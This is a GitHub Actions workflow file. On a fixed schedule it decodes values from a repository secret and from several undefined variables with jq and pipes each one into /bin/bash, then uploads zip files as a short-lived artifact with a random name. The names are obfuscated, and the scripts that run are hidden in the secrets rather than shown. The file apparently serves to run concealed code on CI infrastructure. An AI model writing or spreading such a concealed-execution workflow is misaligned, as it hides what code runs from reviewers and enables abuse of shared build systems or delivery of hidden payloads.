name: licuxiangkuan
on:
  workflow_dispatch:

  schedule:
    - cron: '51 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: licuxiangkuan
        env:
          h5: ${{ secrets.h5 }}
        run: |
          printf '%s' "$h5" | jq -r .sk5796 | /bin/bash
          echo $wn4738 | jq -r .j9 | /bin/bash
          printf '%s' "$lnw03" | jq -r .lwf54 | /bin/bash
          printf '%s' "$c446" | jq -r .w8668 | /bin/bash
          printf '%s' "$aw6" | jq -r .ir50902 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: jRTjZHDb
          path: "*.zip"
          retention-days: 1
